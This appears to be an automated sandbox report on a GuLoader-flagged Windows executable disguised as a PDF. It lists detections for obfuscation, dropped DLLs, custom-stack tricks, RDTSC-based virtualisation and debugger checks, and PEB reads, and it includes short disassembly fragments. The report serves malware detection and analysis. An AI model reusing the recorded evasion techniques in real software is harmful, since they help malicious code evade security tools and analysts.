Source: Binary string: wntdll.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: sdchange.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2279952126.0000000004C51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBC1B63
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_6FBC2FD0 push eax; ret 0_2_6FBC2FFE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D309AD push ecx; mov dword ptr [esp], ecx 4_2_32D309B6
Drops PE files
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll Jump to dropped file
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe API/Special instruction interceptor: Address: 51EB1B2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe API/Special instruction interceptor: Address: 1DDB1B2
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe RDTSC instruction interceptor: First address: 51AAF3C second address: 51AAF3C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1BB0BB00A8h 0x00000006 test cl, bl 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe RDTSC instruction interceptor: First address: 1D9AF3C second address: 1D9AF3C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1BB0FCA728h 0x00000006 test cl, bl 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5BBA0 rdtsc 4_2_32D5BBA0
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe API coverage: 0.3 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\sdchange.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose, 0_2_004065C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405996
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603885023.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504531613.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504308174.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: sdchange.exe, 00000007.00000002.2936326745.0000000000896000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2936943010.000000000062F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2917594405.0000024A0302C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\sdchange.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\sdchange.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5BBA0 rdtsc 4_2_32D5BBA0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk, 4_2_32D735C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBC1B63
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h] 4_2_32D2B2D3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h] 4_2_32D2B2D3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h] 4_2_32D2B2D3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E052E2 mov eax, dword ptr fs:[00000030h] 4_2_32E052E2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5F2D0 mov eax, dword ptr fs:[00000030h] 4_2_32D5F2D0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5F2D0 mov eax, dword ptr fs:[00000030h] 4_2_32D5F2D0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D392C5 mov eax, dword ptr fs:[00000030h] 4_2_32D392C5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D392C5 mov eax, dword ptr fs:[00000030h] 4_2_32D392C5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF2F8 mov eax, dword ptr fs:[00000030h] 4_2_32DEF2F8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D292FF mov eax, dword ptr fs:[00000030h] 4_2_32D292FF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h] 4_2_32D402E1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h] 4_2_32D402E1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h] 4_2_32D402E1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6329E mov eax, dword ptr fs:[00000030h] 4_2_32D6329E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6329E mov eax, dword ptr fs:[00000030h] 4_2_32D6329E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6E284 mov eax, dword ptr fs:[00000030h] 4_2_32D6E284
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6E284 mov eax, dword ptr fs:[00000030h] 4_2_32D6E284
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h] 4_2_32DB0283
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h] 4_2_32DB0283
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h] 4_2_32DB0283
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05283 mov eax, dword ptr fs:[00000030h] 4_2_32E05283
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov eax, dword ptr fs:[00000030h] 4_2_32DB92BC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov eax, dword ptr fs:[00000030h] 4_2_32DB92BC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov ecx, dword ptr fs:[00000030h] 4_2_32DB92BC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov ecx, dword ptr fs:[00000030h] 4_2_32DB92BC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402A0 mov eax, dword ptr fs:[00000030h] 4_2_32D402A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402A0 mov eax, dword ptr fs:[00000030h] 4_2_32D402A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h] 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h] 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h] 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h] 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h] 4_2_32DF92A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h] 4_2_32DF92A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h] 4_2_32DF92A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h] 4_2_32DF92A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov ecx, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC72A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC72A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC72A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC72A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A250 mov eax, dword ptr fs:[00000030h] 4_2_32D2A250
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEB256 mov eax, dword ptr fs:[00000030h] 4_2_32DEB256
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEB256 mov eax, dword ptr fs:[00000030h] 4_2_32DEB256
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D36259 mov eax, dword ptr fs:[00000030h] 4_2_32D36259
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29240 mov eax, dword ptr fs:[00000030h] 4_2_32D29240
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29240 mov eax, dword ptr fs:[00000030h] 4_2_32D29240
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6724D mov eax, dword ptr fs:[00000030h] 4_2_32D6724D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D59274 mov eax, dword ptr fs:[00000030h] 4_2_32D59274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D71270 mov eax, dword ptr fs:[00000030h] 4_2_32D71270
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D71270 mov eax, dword ptr fs:[00000030h] 4_2_32D71270
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h] 4_2_32D34260
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h] 4_2_32D34260
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h] 4_2_32D34260
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFD26B mov eax, dword ptr fs:[00000030h] 4_2_32DFD26B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFD26B mov eax, dword ptr fs:[00000030h] 4_2_32DFD26B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2826B mov eax, dword ptr fs:[00000030h] 4_2_32D2826B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05227 mov eax, dword ptr fs:[00000030h] 4_2_32E05227
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D67208 mov eax, dword ptr fs:[00000030h] 4_2_32D67208
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D67208 mov eax, dword ptr fs:[00000030h] 4_2_32D67208
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2823B mov eax, dword ptr fs:[00000030h] 4_2_32D2823B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEB3D0 mov ecx, dword ptr fs:[00000030h] 4_2_32DEB3D0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEC3CD mov eax, dword ptr fs:[00000030h] 4_2_32DEC3CD
